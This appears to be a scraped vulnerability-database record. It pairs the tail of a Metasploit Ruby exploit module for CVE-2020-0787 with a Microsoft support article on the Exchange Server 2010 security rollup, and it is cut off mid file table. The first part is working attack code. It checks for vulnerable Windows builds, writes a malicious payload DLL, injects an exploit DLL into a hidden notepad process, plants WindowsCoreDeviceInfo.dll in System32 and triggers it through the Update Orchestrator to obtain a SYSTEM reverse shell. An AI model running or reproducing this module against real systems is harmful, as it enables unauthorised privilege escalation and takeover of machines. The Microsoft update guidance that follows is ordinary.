\n}, \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'thread', \n'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp', \n'WfsDelay' => 900 \n} \n) \n) \n \nregister_options([ \nOptBool.new('OVERWRITE_DLL', [true, 'Overwrite WindowsCoreDeviceInfo.dll if it exists (false by default).', false]), \nOptInt.new('JOB_WAIT_TIME', [true, 'Time to wait for the BITS job to complete before starting the USO service to execute the uploaded payload, in seconds', 20]) \n]) \nend \n \ndef target_not_presently_supported \nprint_warning('This target is not presently supported by this exploit. Support may be added in the future!') \nprint_warning('Attempts to exploit this target with this module WILL NOT WORK!') \nend \n \ndef check \nsysinfo_value = sysinfo['OS'] \n \nif sysinfo_value !~ /windows/i \n# Non-Windows systems are definitely not affected. \nreturn CheckCode::Safe('Target is not a Windows system, so it is not affected by this vulnerability!') \nend \n \n# XXX Using session.shell_command_token over cmd_exec() here as @wvu-r7 noticed cmd_exec() was broken under some situations. \nbuild_num_raw = session.shell_command_token('cmd.exe /c ver') \nbuild_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/) \nif build_num.nil? \nprint_error(\"Couldn't retrieve the target's build number!\") \nelse \nbuild_num = build_num_raw.match(/\\d+\\.\\d+\\.\\d+\\.\\d+/)[0] \nprint_status(\"Target's build number: #{build_num}\") \nend \n \n# see https://docs.microsoft.com/en-us/windows/release-information/ \nunless sysinfo_value =~ /(7|8|8\\.1|10|2008|2012|2016|2019|1803|1903)/ \nreturn CheckCode::Safe('Target is not running a vulnerable version of Windows!') \nend \n \nbuild_num_gemversion = Gem::Version.new(build_num) \n \n# Build numbers taken from https://www.qualys.com/research/security-alerts/2020-03-10/microsoft/ \nif (build_num_gemversion >= Gem::Version.new('10.0.18363.0')) && (build_num_gemversion < Gem::Version.new('10.0.18363.719')) # Windows 10 v1909 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1909 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.18362.0')) && (build_num_gemversion < Gem::Version.new('10.0.18362.719')) # Windows 10 v1903 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1903 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.17763.0')) && (build_num_gemversion < Gem::Version.new('10.0.17763.1098')) # Windows 10 v1809 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1809 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.17134.0')) && (build_num_gemversion < Gem::Version.new('10.0.17134.1365')) # Windows 10 v1803 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1803 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.16299.0')) && (build_num_gemversion < Gem::Version.new('10.0.16299.1747')) # Windows 10 v1709 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1709 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.15063.0')) && (build_num_gemversion < Gem::Version.new('10.0.15063.2313')) # Windows 10 v1703 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1703 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.14393.0')) && (build_num_gemversion < Gem::Version.new('10.0.14393.3564')) # Windows 10 v1607 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1607 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.10586.0')) && (build_num_gemversion < Gem::Version.new('10.0.10586.9999999')) # Windows 10 v1511 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1511 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('10.0.10240.0')) && (build_num_gemversion < Gem::Version.new('10.0.10240.18519')) # Windows 10 v1507 \nreturn CheckCode::Appears('Vulnerable Windows 10 v1507 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('6.3.9600.0')) && (build_num_gemversion < Gem::Version.new('6.3.9600.19665')) # Windows 8.1/Windows Server 2012 R2 \ntarget_not_presently_supported \nreturn CheckCode::Appears('Vulnerable Windows 8.1/Windows Server 2012 R2 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('6.2.9200.0')) && (build_num_gemversion < Gem::Version.new('6.2.9200.23009')) # Windows 8/Windows Server 2012 \ntarget_not_presently_supported \nreturn CheckCode::AppearsAppears('Vulnerable Windows 8/Windows Server 2012 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('6.1.7600.0')) && (build_num_gemversion < Gem::Version.new('6.1.7601.24549')) # Windows 7/Windows Server 2008 R2 \ntarget_not_presently_supported \nreturn CheckCode::Appears('Vulnerable Windows 7/Windows Server 2008 R2 build detected!') \nelsif (build_num_gemversion >= Gem::Version.new('6.0.6001.0')) && (build_num_gemversion < Gem::Version.new('6.0.6003.20749')) # Windows Server 2008/Windows Server 2008 SP2 \ntarget_not_presently_supported \nreturn CheckCode::Appears('Windows Server 2008/Windows Server 2008 SP2 build detected!') \nelse \nreturn CheckCode::Safe('The build number of the target machine does not appear to be a vulnerable version!') \nend \nend \n \ndef check_target_is_running_supported_windows_version \nif sysinfo['OS'].match('Windows').nil? \nfail_with(Failure::NotVulnerable, 'Target is not running Windows!') \nelsif sysinfo['OS'].match('Windows 10').nil? && sysinfo['OS'].match('Windows Server 2016').nil? && sysinfo['OS'].match('Windows Server 2019').nil? \nfail_with(Failure::BadConfig, 'Target is running Windows, its not a version this module supports! Bailing...') \nend \nend \n \ndef check_target_and_payload_match_and_supported(client_arch) \nif (client_arch != ARCH_X64) && (client_arch != ARCH_X86) \nfail_with(Failure::BadConfig, 'This exploit currently only supports x86 and x64 targets!') \nend \npayload_arch = payload.arch.first # TODO: Add missing documentation for payload.arch, @wvu used this first but it is not documented anywhere. \nif (payload_arch != ARCH_X64) && (payload_arch != ARCH_X86) \nfail_with(Failure::BadConfig, \"Unsupported payload architecture (#{payload_arch})\") # Unsupported architecture, so return an error. \nend \nif ((client_arch == ARCH_X64) && (payload_arch != ARCH_X64)) || ((client_arch == ARCH_X86) && (payload_arch != ARCH_X86)) \nfail_with(Failure::BadConfig, \"Payload architecture (#{payload_arch}) doesn't match the architecture of the target (#{client_arch})!\") \nend \nend \n \ndef check_windowscoredeviceinfo_dll_exists_on_target \n# Taken from bwatters-r7's cve-2020-0688_service_tracing.rb code. \n# \n# We are going to overwrite the WindowsCoreDeviceInfo.dll DLL as part of our exploit. \n# The second part of this exploit will trigger a Update Session to be created so that this DLL \n# is loaded, which will result in arbitrary code execution as SYSTEM. \n# \n# To prevent any errors, we will first check that this file doesn't exist and ask the user if they are sure \n# that they want to overwrite the file. \nwin_dir = session.sys.config.getenv('windir') \nnormal_target_payload_pathname = \"#{win_dir}\\\\System32\\\\WindowsCoreDeviceInfo.dll\" \nwow64_target_payload_pathname = \"#{win_dir}\\\\Sysnative\\\\WindowsCoreDeviceInfo.dll\" \nwow64_existing_file = \"#{win_dir}\\\\Sysnative\\\\win32k.sys\" \nif file?(wow64_existing_file) \nif file?(wow64_target_payload_pathname) \nprint_warning(\"#{wow64_target_payload_pathname} already exists\") \nprint_warning('If it is in use, the overwrite will fail') \nunless datastore['OVERWRITE_DLL'] \nprint_error('Change OVERWRITE_DLL option to true if you would like to proceed.') \nfail_with(Failure::BadConfig, \"#{wow64_target_payload_pathname} already exists and OVERWRITE_DLL option is false\") \nend \nend \ntarget_payload_pathname = wow64_target_payload_pathname \nelsif file?(normal_target_payload_pathname) \nprint_warning(\"#{normal_target_payload_pathname} already exists\") \nprint_warning('If it is in use, the overwrite will fail') \nunless datastore['OVERWRITE_DLL'] \nprint_error('Change OVERWRITE_DLL option to true if you would like to proceed.') \nfail_with(Failure::BadConfig, \"#{normal_target_payload_pathname} already exists and OVERWRITE_DLL option is false\") \nend \ntarget_payload_pathname = normal_target_payload_pathname \nend \ntarget_payload_pathname \nend \n \ndef launch_background_injectable_notepad \nprint_status('Launching notepad to host the exploit...') \nnotepad_process = client.sys.process.execute('notepad.exe', nil, 'Hidden' => true) \nprocess = client.sys.process.open(notepad_process.pid, PROCESS_ALL_ACCESS) \nprint_good(\"Process #{process.pid} launched.\") \nprocess \nrescue Rex::Post::Meterpreter::RequestError \n# Sandboxes could not allow to create a new process \n# stdapi_sys_process_execute: Operation failed: Access is denied. \nprint_error('Operation failed. Trying to elevate the current process...') \nprocess = client.sys.process.open \nprocess \nend \n \ndef exploit \n# NOTE: Automatic check is implemented by the AutoCheck mixin \nsuper \n \n# Step 1: Check target environment is correct. \nprint_status('Step #1: Checking target environment...') \nif is_system? \nfail_with(Failure::None, 'Session is already elevated') \nend \nclient_arch = sysinfo['Architecture'] \ncheck_target_is_running_supported_windows_version \ncheck_target_and_payload_match_and_supported(client_arch) \ncheck_windowscoredeviceinfo_dll_exists_on_target \n \n# Step 2: Generate the malicious DLL and upload it to a temp location. \nprint_status('Step #2: Generating the malicious DLL...') \npath = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787') \ndatastore['EXE::Path'] = path \nif client_arch =~ /x86/i \ndatastore['EXE::Template'] = ::File.join(path, 'template_x86_windows.dll') \nlibrary_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787', 'CVE-2020-0787.x86.dll') \nlibrary_path = ::File.expand_path(library_path) \nelsif client_arch =~ /x64/i \ndatastore['EXE::Template'] = ::File.join(path, 'template_x64_windows.dll') \nlibrary_path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2020-0787', 'CVE-2020-0787.x64.dll') \nlibrary_path = ::File.expand_path(library_path) \nend \n \npayload_dll = generate_payload_dll \nprint_status(\"Payload DLL is #{payload_dll.length} bytes long\") \ntemp_directory = session.sys.config.getenv('%TEMP%') \nmalicious_dll_location = \"#{temp_directory}\\\\\" + Rex::Text.rand_text_alpha(6..13) + '.dll' \nwrite_file(malicious_dll_location, payload_dll) \nregister_file_for_cleanup(malicious_dll_location) \n \n# Step 3: Load the main DLL that will trigger the exploit and conduct the arbitrary file copy. \nprint_status('Step #3: Loading the exploit DLL to run the main exploit...') \nprocess = launch_background_injectable_notepad \n \nprint_status(\"Injecting DLL into #{process.pid}...\") \nexploit_mem, offset = inject_dll_into_process(process, library_path) \n \ndll_info_parameter = malicious_dll_location.to_s \npayload_mem = inject_into_process(process, dll_info_parameter) \n \n# invoke the exploit, passing in the address of the payload that \n# we want invoked on successful exploitation. \nprint_status('DLL injected. Executing injected DLL...') \nprocess.thread.create(exploit_mem + offset, payload_mem) \n \nprint_status(\"Sleeping for #{datastore['JOB_WAIT_TIME']} seconds to allow the exploit to run...\") \nsleep datastore['JOB_WAIT_TIME'] \n \nregister_file_for_cleanup('C:\\\\Windows\\\\System32\\\\WindowsCoreDeviceInfo.dll') # Register this file for cleanup so that if we fail, then the file is cleaned up. \n# Normally we can't delete this file though as there will be a SYSTEM service that has a handle to this file. \n \nprint_status(\"Starting the interactive scan job...\") \n# Step 4: Execute `usoclient StartInteractiveScan` to trigger the payload \n# XXX Using session.shell_command_token over cmd_exec() here as @wvu-r7 noticed cmd_exec() was broken under some situations. \nsession.shell_command_token('usoclient StartInteractiveScan') \n \nprint_status(\"Enjoy the shell!\") \nend \nend \n`\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/158056/cve_2020_0787_bits_arbitrary_file_move.rb.txt"}], "mskb": [{"lastseen": "2021-01-01T22:44:28", "bulletinFamily": "microsoft", "cvelist": ["CVE-2020-0688"], "description": "<html><body><p>Description of the security update for Microsoft Exchange Server 2010: February 11, 2020</p><h2></h2><p>This update rollup is a security update that provides a security advisory in Microsoft Exchange.\u00a0To learn more about these\u00a0vulnerabilities, see the following Common Vulnerabilities and Exposures (CVE):</p><ul><li><a href=\"https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0688\" managed-link=\"\" target=\"_blank\">CVE-2020-0688 | Microsoft Exchange Memory Corruption Vulnerability</a></li></ul><p>This update also fixes the following issue:</p><p class=\"indent-1\"><a data-content-id=\"4540267\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">4540267</a>\u00a0MSExchangeDelivery.exe or EdgeTransport.exe crashes in Exchange Server 2013 and Exchange Server 2010</p><h2>Known issues in this security update</h2><ul><li><p>When you try to manually install this security update by double-clicking the update file (.msp) to run it in \"Normal mode\" (that is, not as an administrator), some files are not correctly updated.</p><p>When this issue occurs, you don\u2019t receive an error message or any indication that the security update was not correctly installed. However, Outlook Web Access (OWA) and the Exchange Control Panel (ECP) may stop working. This issue occurs on servers that are using user account control (UAC). The issue occurs because the security update doesn\u2019t correctly stop certain Exchange-related services.</p><p>To avoid this issue, follow these steps to manually install this security update:</p><ol><li>Select <strong>Start</strong>, and type\u00a0<strong>cmd</strong>.</li><li>In the results, right-click <strong>Command Prompt</strong>, and then select <strong>Run as administrator</strong>.</li><li>If the <strong>User Account Control</strong> dialog box appears, verify that the default action is the action that you want, and then select <strong>Continue</strong>.</li><li>Type the full path of the .msp file, and then press Enter.</li></ol><p>This issue does not occur when you install the update through Microsoft Update.</p></li><li><p>Exchange services may remain in a disabled state after you install this security update. This condition does not indicate that the update is not installed correctly. This condition may occur if the service control scripts experience a problem when they try to return Exchange services to its usual state. To fix this issue, use Services Manager to restore the startup type to <strong>Automatic</strong>, and then start the affected Exchange services manually. To avoid this issue, run the security update at an elevated command prompt. For more information about how to open an elevated Command Prompt window, see\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"https://technet.microsoft.com/en-us/library/cc947813(v=ws.10).aspx\" managed-link=\"\" target=\"_blank\">Start a Command Prompt as an Administrator</a>.</p></li></ul><h2>How to get and install the update</h2><h3>Method 1: Microsoft Update</h3><p>This update is available from Microsoft Update. When you turn on automatic updating, this update will be downloaded and installed automatically. For more information about how to get security updates automatically, see\u00a0<a aria-live=\"rude\" bookmark-id=\"\" data-bi-name=\"content-anchor-link\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/help/12373/windows-update-faq\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">Windows Update: FAQ</a>.</p><h3>Method 2: Microsoft Update Catalog</h3><p>To get the standalone package for this update, go to the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"http://www.catalog.update.microsoft.com/Search.aspx?q=KB4536989\" managed-link=\"\" target=\"_blank\">Microsoft Update Catalog</a>\u00a0website.</p><h3>Method 3: Microsoft Download Center</h3><p>You can get the standalone update package through the Microsoft Download Center.</p><ul linespacing=\"1\" style=\"list-style-type:UnorderedBullets\" type=\"UnorderedBullets\"><li><span asset=\"4009805\" contenteditable=\"false\" props='{\"size\":\"full\"}' unselectable=\"on\">4009805</span><a data-content-id=\"\" data-content-type=\"\" href=\"http://www.microsoft.com/download/details.aspx?FamilyID=4d072d3e-153e-4a5a-859e-ad054fe24107\" managed-link=\"\" target=\"_blank\">Download Update Rollup 30 for Exchange Server 2010 SP3 (KB4536989)</a></li></ul><h2>Update detail information for Exchange Server 2010 SP3</h2><h3>Installation instructions for\u00a0Exchange Server 2010 SP3</h3><p>Learn more about <a data-content-id=\"\" data-content-type=\"\" href=\"http://technet.microsoft.com/library/ff637981.aspx\" id=\"kb-link-6\" managed-link=\"\" target=\"_blank\">how to install the latest update rollup for Exchange Server 2010</a>.</p><p>Also, learn about the following update installation scenarios.</p><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Install the update on computers that aren't connected to the internet</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><div class=\"kb-collapsible kb-collapsible-collapsed\">When you install this update rollup on a computer that isn't connected to the internet, you may experience a long installation time. Additionally, you may receive the following message:</div><div class=\"sbody-error\">Creating Native images for .Net assemblies.</div><div class=\"kb-collapsible kb-collapsible-collapsed\">This issue is caused by network requests to connect to the following website:<br/>\u00a0</div><div class=\"kb-collapsible kb-collapsible-collapsed\"><a data-content-id=\"\" data-content-type=\"\" href=\"http://crl.microsoft.com/pki/crl/products/codesigpca.crl\" target=\"_blank\">http://crl.microsoft.com/pki/crl/products/CodeSigPCA.crl</a><br/><br/>These network requests are attempts to access the certificate revocation list for each assembly that native image generation (NGen) compiles to native code. However, because the server that's running Exchange Server isn't connected to the internet, each request must wait to time out before the process can continue.<br/><br/>To fix this issue, follow these steps:<br/>\u00a0</div><ol><li><div class=\"kb-collapsible kb-collapsible-collapsed\">In Internet Explorer, select <strong class=\"uiterm\">Internet Options</strong>\u00a0on the <strong class=\"uiterm\">Tools</strong> menu, and then select <strong class=\"uiterm\">Advanced</strong>.</div></li><li><div class=\"kb-collapsible kb-collapsible-collapsed\">In the <strong class=\"uiterm\">Security</strong> section, clear the <strong class=\"uiterm\">Check for publisher's certificate revocation</strong> check box, and then select <strong class=\"uiterm\">OK</strong>.<br/><br/><strong>Note</strong> Clear this security option only if the computer is in a tightly-controlled environment.\u00a0\u00a0</div></li><li>When the Setup process is finished, select the <strong>Check for publisher's certificate revocation</strong> check box again.</li></ol></div></div><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Install the update on computers that have customized Outlook Web App files</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><p><strong>Important </strong>Before you apply this update rollup, make a backup copy of any <a data-content-id=\"\" data-content-type=\"\" href=\"http://technet.microsoft.com/library/ee633483(exchg.140).aspx\" id=\"kb-link-8\" managed-link=\"\" target=\"_blank\">customized Outlook Web App</a>\u00a0files.<br/><br/>When you apply an update rollup package, the update process updates the Outlook Web App files, if this is\u00a0required. Therefore, any customizations to the Logon.aspx file or to other Outlook Web App files are overwritten, and you must re-create the Outlook Web App customizations in Logon.aspx.</p></div></div><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Install the update for CAS Proxy Deployment Guidance customers who deploy CAS-CAS proxying</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><p><span>If your scenario\u00a0meets both the following conditions, apply the update rollup on the internet-facing Client Access servers (CAS) before you apply the update rollup on the non\u2013internet-facing CAS:</span></p><div class=\"kb-collapsible kb-collapsible-collapsed\"><ul class=\"sbody-free_list\"><li>You're a CAS Proxy Deployment Guidance customer.</li><li>You have deployed <a data-content-id=\"\" data-content-type=\"\" href=\"http://technet.microsoft.com/library/bb310763(exchg.140).aspx\" id=\"kb-link-9\" managed-link=\"\" target=\"_blank\">CAS-CAS proxying</a>.</li></ul><p><strong>Note </strong>For other Exchange Server 2010 configurations, you don't have to apply the update rollup on your servers in any particular order.</p></div></div></div><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">Install this update on a DBCS version of Windows Server 2012</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><p>You can't install or uninstall Update Rollup 30 for Exchange Server 2010 SP3 on a double-byte character set (DBCS) version of Windows Server 2012 if the language preference for non-Unicode programs is set to the default language. To work around this issue, you must first change this setting. To do this, follow these steps:</p><ol><li>In Control Panel, select\u00a0<strong>Clock, Region and Language</strong>, select\u00a0<strong>Region</strong>, and then select\u00a0<strong>Administrative</strong>.</li><li>In the\u00a0<strong>Language for non-Unicode programs</strong>\u00a0area, select\u00a0<strong>Change system locale</strong>.</li><li>In the\u00a0<strong>Current system locale</strong>\u00a0list, select\u00a0<strong>English (United States)</strong>, and then select\u00a0<strong>OK</strong>.</li></ol><p>After you successfully install or uninstall Update Rollup 30, revert this language setting, as appropriate.</p></div></div></div><h3 class=\"sbody-h3\">Restart requirement</h3><p>The required services are restarted automatically after\u00a0you apply this update rollup.</p><h3 class=\"sbody-h3\">Removal information</h3><p>To remove Update Rollup 30 for Exchange Server 2010 SP3, use the\u00a0<strong class=\"uiterm\">Add or Remove Programs</strong>\u00a0item in Control Panel to remove update <strong>KB4536989</strong>.</p><h2>More information</h2><h3>Security update deployment information</h3><p>For deployment information about this update, see\u00a0<a aria-live=\"rude\" data-bi-name=\"content-anchor-link\" data-content-id=\"\" data-content-type=\"\" href=\"https://support.microsoft.com/help/20200211\" managed-link=\"\" tabindex=\"0\" target=\"_blank\">security update deployment information: February 11, 2020</a>.\u00a0</p><h3>Security update replacement information</h3><p>This security update replaces the following previously released update:</p><ul><li><a data-content-id=\"4509410\" data-content-type=\"article\" href=\"\" managed-link=\"\" target=\"_blank\">Description of the security update for Microsoft Exchange Server 2010: July 9, 2019</a></li></ul><h2>File information</h2><h3>File hash information</h3><table class=\"table\"><tbody><tr><th>Update name</th><th>File name</th><th>SHA1 hash</th><th>SHA256 hash</th></tr><tr><td>Update Rollup 30 for Exchange Server 2010</td><td>Exchange2010-KB4536989-x64-en.msp</td><td>2DD3EB1C737743941FB56293BB9A68242F0F52E2</td><td>95B0704B6F7841883C8999F5809A84FD0EBAD9E99F339DA18C47AA63F82963C4</td></tr></tbody></table><h3>Exchange Server file information</h3><p>The English (United States) version of this update installs files that have the attributes that are listed in the following tables. The dates and times for these files are listed in Coordinated Universal Time (UTC). The dates and times for these files on your local computer are displayed in your local time together with your current daylight-saving time (DST) bias. Additionally, the dates and times may change when you perform certain operations on the files.</p><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\">Update Rollup 30 for Exchange Server 2010</span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><table class=\"table\"><tbody><tr><th>File name</th><th>File version</th><th>File size</th><th>Date</th><th>Time</th><th>Platform</th></tr><tr><td>A33e7066a3f143ef8386e08c4458051d_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Abv_dg.dll</td><td>14.3.470.0</td><td>898,992</td><td>03-Jan-2020</td><td>05:46</td><td>x64</td></tr><tr><td>Addreplicatopfrecursive.ps1</td><td>Not applicable</td><td>13,837</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Addressbook.aspx</td><td>Not applicable</td><td>3,830</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Adduserstopfrecursive.ps1</td><td>Not applicable</td><td>13,465</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Af46d2bd14db43e0b49619bd0eeb07ec_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Aggregatepfdata.ps1</td><td>Not applicable</td><td>17,393</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Airfilter.dll</td><td>14.3.470.0</td><td>49,584</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Airsynctistateparser.dll</td><td>14.3.470.0</td><td>83,376</td><td>03-Jan-2020</td><td>05:48</td><td>x64</td></tr><tr><td>Ajaxcontroltoolkit.dll</td><td>14.3.470.0</td><td>110,280</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Alsperf.dll1</td><td>14.3.470.0</td><td>27,568</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Antispamcommon.ps1</td><td>Not applicable</td><td>11,413</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Asdat.msi</td><td>Not applicable</td><td>5,083,136</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Asentirs.msi</td><td>Not applicable</td><td>73,728</td><td>03-Jan-2020</td><td>05:50</td><td>Not applicable</td></tr><tr><td>Asentsig.msi</td><td>Not applicable</td><td>73,728</td><td>03-Jan-2020</td><td>05:50</td><td>Not applicable</td></tr><tr><td>Attachfiledialog.aspx</td><td>Not applicable</td><td>5,346</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Autodisc_web.config</td><td>Not applicable</td><td>89,637</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicaddressbook.aspx</td><td>Not applicable</td><td>4,217</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicattachmentmanager.aspx</td><td>Not applicable</td><td>3,826</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicautosaveinfo.aspx</td><td>Not applicable</td><td>4,255</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basiccalendaritemschedulingtab.aspx</td><td>Not applicable</td><td>6,908</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basiccalendarview.aspx</td><td>Not applicable</td><td>3,259</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basiccontactview.aspx</td><td>Not applicable</td><td>3,586</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basiccontactviewwebpart.aspx</td><td>Not applicable</td><td>2,485</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basiceditcalendaritem.aspx</td><td>Not applicable</td><td>17,517</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basiceditcontact.aspx</td><td>Not applicable</td><td>6,356</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basiceditmeetingresponse.aspx</td><td>Not applicable</td><td>11,664</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basiceditmessage.aspx</td><td>Not applicable</td><td>8,801</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basiceditrecurrence.aspx</td><td>Not applicable</td><td>14,645</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicfoldermanagement.aspx</td><td>Not applicable</td><td>3,630</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicmeetingpage.aspx</td><td>Not applicable</td><td>12,659</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicmessageview.aspx</td><td>Not applicable</td><td>4,084</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicmessageviewwebpart.aspx</td><td>Not applicable</td><td>2,625</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicmoveitem.aspx</td><td>Not applicable</td><td>4,112</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicoptions.aspx</td><td>Not applicable</td><td>3,506</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicreadaddistributionlist.aspx</td><td>Not applicable</td><td>4,364</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicreadadorgperson.aspx</td><td>Not applicable</td><td>4,434</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicreadcontact.aspx</td><td>Not applicable</td><td>4,406</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicreaddistributionlist.aspx</td><td>Not applicable</td><td>4,864</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Basicreadmessage.aspx</td><td>Not applicable</td><td>7,071</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Bpa.common.dll</td><td>14.3.470.0</td><td>233,160</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Bpa.configcollector.dll</td><td>14.3.470.0</td><td>126,664</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Bpa.networkcollector.dll</td><td>14.3.470.0</td><td>69,320</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Bpa.userinterface.dll</td><td>14.3.470.0</td><td>536,264</td><td>03-Jan-2020</td><td>05:48</td><td>x86</td></tr><tr><td>Bpa.wizardengine.dll</td><td>14.3.470.0</td><td>134,856</td><td>03-Jan-2020</td><td>05:49</td><td>x86</td></tr><tr><td>Bsres.dll</td><td>14.3.470.0</td><td>92,592</td><td>03-Jan-2020</td><td>05:47</td><td>x64</td></tr><tr><td>C3197ef34a9e495cb17370b20389036a_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>C4f748eeabe04db79b17bab56b1285a4_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Calcalculation.ps1</td><td>Not applicable</td><td>29,804</td><td>03-Jan-2020</td><td>05:47</td><td>Not applicable</td></tr><tr><td>Captedt.js</td><td>Not applicable</td><td>11,208</td><td>03-Jan-2020</td><td>05:46</td><td>Not applicable</td></tr><tr><td>Casredirect.aspx</td><td>Not applicable</td><td>4,842</td><td>03-Jan-2020</td><td>05:49</td><td>Not applicable</td></tr><tr><td>Cb8b92743d7f42a7b8e53fe033206469_premium.css</td><td>Not applicable</td><td>202,304</td><td>03-Jan-2020</td><td>05:47</td><td>Not 